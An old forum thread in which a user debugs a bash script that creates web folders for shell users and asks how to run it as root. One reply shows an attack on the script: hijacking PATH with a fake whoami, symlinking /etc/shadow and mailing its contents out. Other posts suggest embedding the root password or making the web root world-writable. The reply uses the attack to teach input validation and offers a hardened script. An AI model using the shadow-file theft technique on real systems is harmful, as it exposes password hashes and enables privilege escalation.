bash script problem with "else"

evilchild · 11-15-2003, 10:47 PM

ok, i writting a bash script for users that request webspace the problem is when i run the script i get a syntax error on line 17 with else
heres the script
{
#!/bin/bash
# web space tool built by seejay

me=$(whoami)
choice = " "

echo "With your existing shell account you can create a web page you can access threw your account, but you must know html in order to use this feature, are you sure you want to create a web account ? yes or no"
read choice

# if user says yes there dir is created in the web folder
if choice = "yes"
mkdir /var/www/html/$me/
echo "your web folder is /var/www/html/$me/ and can be viewed at myweb.site/$me/ "

else
echo your web folder will not be created, thanks for using n3tlab
exit
fi

done
}
another problem is that the command "mkdir /var . .. . . " will need to run as root but, exactly how would i do that?

thanks

teval · 11-15-2003, 11:48 PM

To fix the mkdir you would have to add

su

before it
This would mean typing in the root password every time.

/bin/bash · 11-16-2003, 04:03 AM

You need a then before the else

if
then
else
fi

Also your if is not right:
if [ $choice = "yes" ]
then

evilchild · 11-16-2003, 12:44 PM

well with the changes /bin/bash said to make the script still wont work no matter what i type at the prompt when it ask "yes or no" it trys to created to directory anyways, and i know that in order for this script to run as root, i would have to put "su root" and then enter the password but is there any way i could make it "sudo root" and have the script enter the password with out the user having too ?
here's the changes i made
#!/bin/bash
# web started tool built by seejay

me=$(whoami)
choice=" "

#intro for user
echo "With your existing shell account you can create a web page you can access threw your account, but you must know html in order to use this feature, are you sure you want to create a web account ? yes or no"
read choice

# if user says yes there dir is created in the web folder
if [ $choice="yes" ]
then
mkdir /var/www/html/$me/
echo "your web folder is /var/www/html/$me/ and can be viewed at myweb.site/$me/ "
exit

#if user says no or anything else
else
echo "your web folder will not be created, thanks for using n3tlab"
exit
fi
#done

crash748 · 11-16-2003, 12:59 PM

You can make the /var/www/html dir read & writable for everywone.

If they can't make a dir or folder, they can't upload any files aswell

evilchild · 11-16-2003, 04:18 PM

is there away i can make the script sudo root and the script enters the pass, then set the permissions on the script so that users cant read it but they can execute it, and in script put a chown command that sets the user as the owner of their web folder? do u think that could be done?

evilchild · 11-16-2003, 05:09 PM

ok i sovled the problem of "mkdir /var/www/html" , by making a folder call freespace that every one could write to, but the next problem is that no matter what the user inputs it creates them a folder even if the user says "no"
here's the modifcations i made to the script
{
#!/bin/bash
# web started tool built by seejay

me=$(whoami)
choice=" "
clear
#intro for user
echo With your existing shell account you can create a web page you can access threw your account, but you must know html in order to use this feature, are you sure you want to create a web account ? yes or no
read choice

# if user says yes there dir is created in the web folder
if [ $choice="yes" ]
then
mkdir /var/www/html/freespace/$me/
echo "your web folder is /var/www/html/freespace/$me/ and can be viewed at mysite/freespace/$me/"
chown $me /var/www/html/freespace/$me
exit

#if user says no or anything else
else
echo "your web folder will not be created, thanks for using n3tlab"
exit
fi
}

/bin/bash · 11-16-2003, 06:09 PM

Sometimes you need whitespace and sometimes you don't?
This will work.
if [ $choice = "yes" ]

evilchild · 11-16-2003, 06:45 PM

ok i took out the spaces . . . if [$choice="yes"] because at first there where spaces between the [ and $ and another between " ], any ways the script works but now when i run it and enter no i get
"With your existing shell account you can create a web page you can access threw your account, but you must know html in order to use this feature, are you sure you want to create a web account ? yes or no
no
/home/seejay/bin/webhosting: line 12: [no=yes]: command not found
your web folder will not be created, thanks for using n3tlab"

unSpawn · 11-16-2003, 08:57 PM

is there away i can make the script sudo root and the script enters the pass, then set the permissions on the script so that users cant read it but they can execute it, and in script put a chown command that sets the user as the owner of their web folder? do u think that could be done?
My answers would be yes, yes, yes and yes.

However, since this will prolly run as root...
[evilchild@localhost /var/tmp]$ PATH=.:$PATH
[evilchild@localhost /var/tmp]$ echo "echo evilchild" > whoami
[evilchild@localhost /var/tmp]$ chmod 0750 whoami
[evilchild@localhost /var/tmp]$ ln -sf /etc/shadow /var/www/html/freespace/evilchild
[evilchild@localhost /var/tmp]$ <runs script>
]With your existing shell account you can create a web page you can access threw your account, but you must know html in order to use this feature, are you sure you want to create a web account ? yes or no
[evilchild@localhost /var/tmp]$ yes
mkdir /var/www/html/freespace/evilchild/
your web folder is /var/www/html/freespace/evilchild/ and can be viewed at mysite/freespace/evilchild/
chown evilchild /var/www/html/freespace/evilchild
[evilchild@localhost /var/tmp]$ cat /var/www/html/freespace/evilchild | mail -s some@account

Even if the above doesn't work, you get the idea. Never trust user input.
Here's an example of how I would do checking, YMMV(VM)? as usual:

Code:

#!/bin/sh
IAM="apply4web.sh"
# Minimal sanitising env
IFS=$' \t\n'; PATH=/bin:/usr/bin
# System UID's should not have a web account
UID_MIN=( $(grep /etc/login.defs -Ee ".?UID_MIN") )
UID_MIN=${UID_MIN[1]}; test -z UID_MIN && exit 1
UID_MAX=( $(grep /etc/login.defs -Ee ".?UID_MAX") )
UID_MAX=${UID_MAX[1]}; test -z UID_MAX && exit 1
# Some flags :-]
set -e -f -u +C +H +P
# Root of server
declare -r WWW_ROOT="/var/www/html/freespace"
# Array, holds user data, if no "getent" use "grep". I refuse to awk for this.
OFS="${IFS}"; IFS=":"
declare -ar name=( $(/usr/bin/getent passwd $(/usr/bin/id -u)) )
IFS=${OFS}; declare -r n="${name[0]}"; declare -r u="${name[2]}"
# Function, logs to syslog on failure
__you_failed() { logger -f /var/log/${IAM}.log -i "$0, in $FUNCNAME: ${name[@]}, status FAILED"; exit 1; }
__log_success() {logger -f /var/log/${IAM}.log -i "make "${WWW_ROOT}/$n", status kinda OK"
}
# Function, checks answer itself. Sue me for overkill
__chk_ans() { case "${#choice}" in 0) __you_failed;; esac
case "$(echo ${choice} | tr [A-Z] [a-z])" in y|yes);; *) exit 1;; esac; }
# Function, checks username and UID for lenght, max chars etc
__chk_u() { case "${#n}" in 0) __you_failed;; esac
if [ "${#n}" -gt "15" ]; then __you_failed; fi
if [ "X$(echo "$n" | tr -d [a-zA-Z0-9])" != "X" ]; then __you_failed; fi
if [ "$u" -lt "$UID_MIN" -o "$u" -gt "$UID_MAX" ]; then __you_failed; fi; }
# Function, checks server root dir and userdir existence
__chk_dirs() { test -e "${WWW_ROOT}" || exit 1
test -d "${WWW_ROOT}/$n" && -install -o "$n" -m 0755 -d "${WWW_ROOT}/$n" || exit 1
test -d "${WWW_ROOT}/$n" && __log_success || exit 1; }
# Done. Let's play :-]
clear
echo "With your existing shell account you can create a web page you can access through \
your account, but you must know HTML in order to use this feature. Are you sure you want \
to create a web account? [y|n|q]"; read choice && __chk_ans && __chk_u && __chk_dirs && \
eval echo "your web folder is ${WWW_ROOT}/$u/ and can be viewed at mysite/freespace/$u/"
exit $?

...however this doesn't automagically mean this script is safe to run as root. The best way would be to queue the "mkdirs" and let root approve manually.

Funny thing is with scripting, if you also make a procmail recipe, you could have them "true | mail "REQ web account" hostmaster@localhost" and automate the whole thing...